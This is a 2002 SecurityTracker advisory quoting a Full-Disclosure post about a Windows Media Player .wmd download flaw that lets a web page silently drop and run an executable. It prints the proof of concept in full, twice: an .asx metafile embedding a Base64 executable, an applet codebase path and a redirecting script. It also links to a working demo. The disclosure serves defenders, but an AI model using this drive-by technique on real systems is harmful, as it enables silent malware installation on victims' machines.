SecurityTracker.com
SecurityTracker Archives

Category:   Application (Multimedia)  >   Windows Media Player
Vendors:   Microsoft
Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them
SecurityTracker Alert ID:  1005108
SecurityTracker URL:  http://securitytracker.com/id/1005108
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 22 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Windows Media Player. A remote user can create HTML that, when loaded by a target user, will silently install and execute code on the user's system.

According to the report, a recently reported applet codebase vulnerability in Internet Explorer also affects Windows Media Player.

It is reported that when Windows Media Player opens a Windows Media Download Package file (a '.wmd' file), it creates a folder named after the '.wmd' file in the default 'Virtual Music' location (My Documents\My Music\Virtual Albums) and extracts the package contents into it. Because the remote user chooses the package name, the extracted files land at a path the remote user can predict.

A remote user can create a '.asx' meta file (that embeds a Base64-encoded executable) with the following type of contents:

<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


<applet CLASSID="CLSID:55555555-5555"
codebase="mhtml:file:///C:\My Documents\My Music\Virtual
Albums\malware\f ck.asx!file:///malware.exe">

The '.asx' file opens with the minimal ASX tags, so Windows Media Player's extraction checks accept it as a valid metafile and write it, embedded payload included, to the known folder.

Then, the remote user can create a '.asf' file that, when loaded, will call the file in the known location. The applet codebase will be executed in the Local Computer zone.

url: cluster.html

<body onload=malware()>
<script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
}
</script>

These two files can be combined in a Windows Media Download package and delivered silently via HTML to the target user.

Impact:   A remote user can cause Windows Media Player to silently download a file to a known location and execute arbitrary code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


Source Message Contents

Subject:  [Full-Disclosure] Terrible: Windows Media Player


Wednesday, August 21, 2002

Dear Mister,

'silent delivery and installation of an executable on the target 
computer, no client input other than viewing a web page' default 
installation of Internet Explorer and Windows Media Player.

This is truly terrible. In addition to server side '404 errors', 
cookies and who knows what else [perhaps user.dat, index.dat, even 
the old inbox.mbx], the Windows Media Player appears to be severely 
affected by Jelmer codebase too.

Combining the Jelmer codebase, the Sandblad dot bug and the 1 year old 
wimpy'flication of the media player [see: 
http://www.malware.com/wimpy.html]

1. Create an *.asx meta file as follows: 

<ASX version="3">
<Entry>
<ref HREF="cluster.asf"/>
</Entry></ASX>
MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


 <applet CLASSID="CLSID:55555555-5555" 
codebase="mhtml:file:///C:\My Documents\My Music\Virtual 
Albums\malware\f ck.asx!file:///malware.exe">

2. Create an *.asf file with URL flip as follows: 

url: cluster.html

<body onload=malware()>
 <script>
function malware(){
alert("malware");location=("file://C%3A%5CMy%20Documents%5CMy%20Music%
5CVirtual%20Albums%5Cmalware%5Cf ck.asx%20.")
 }
  </script>


3. Create a *.wmd file comprising 1 and 2 above. 

What happens? 

Ordinarily the Windows Media Download Package file [*.wmd] creates a 
folder with the given name of the *.wmd file -- e.g. malware.wmd will 
create a folder called malware in the default location for so-
called "Virtual Music" -- specifically: My Documents\My Music\Virtual 
Albums\malware, security measures currently incorporated in the 
extraction of the contents of the *.wmd do a reasonably good job of 
ensuring that files contained within the Download Package, are in 
fact valid files. 

A reasonably good job. 

We find that the bare minimum for the *.asx meta file must include 
the following: 

<ASX><Entry><ref HREF=''/></ASX> 

with these tags the Media Player will indeed extract the *.asx file 
into our known folder. 

So how do we make use of that? 

Simple: 1,2,3 above, buckle your shoe.

Working Example:

[hard coded for win98, trivial tweaking for others - harmless *.exe]

http://www.malware.com/malware.php

Important Notes:

1. Suggestions have been made that in this particular instance, the 
dot bug is not necessary.
2. Suggestions have been made that the 'open' "object" hole of 
http://online.securityfocus.com/bid/5196 will work just as well
3. Disable Active Scripting
4. Disable Media Download [if you can]
5. Change the default location of "My Music..."
6. Hopefully this will all be a bad memory once all the patches, 
packs, whatever are finally released.
7. Forget about the 'glitzy' advertising. Think long and hard about 
the products you install

Pathetic Notes:

A.

1. The codebase 'vulnerability' is over 2 years old. Demonstrated in 
a different form and mentioned in its current form in June 2000 
2. Resurrected in fine fashion at the end of 2001 by the Pull with 
many others demonstrating similar thereafter
3. Added to in splendid fashion by Jelmer in July 2002 with key 
protocol


B. The dot bug by Sandblad of May 2002, patched, not patched, fully 
functional to date. With patch and without patch. Not even actually 
required in this instance.

C. The malware *.asx meta file and packable transportable  *.wmd of 
June 2001.

Helpful Notes:

Instead of sitting around trying to think up ways that all these 
things cannot work, simply fix it the first time round.  There is no 
such thing as 'mitigating factors' and 'hurdles'. This is a lie. Pure 
fantasy. Fiction. Fix it when you can ! For every way you think it 
cannot be done, there are 10 ways it actually can !

This concludes our summer session and as we are entering junior high 
for the first time in a couple weeks, we need to tinker with our 
bicycles while there is still sunlight.

Trust that clarifies matters for you.

Your friend and mine
http://www.malware.com [MVP - malware]

This posting is provided "AS IS" with no warranties, and confers no 
rights.

Over and Out

-- 
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Copyright 2021, SecurityGlobal.net LLC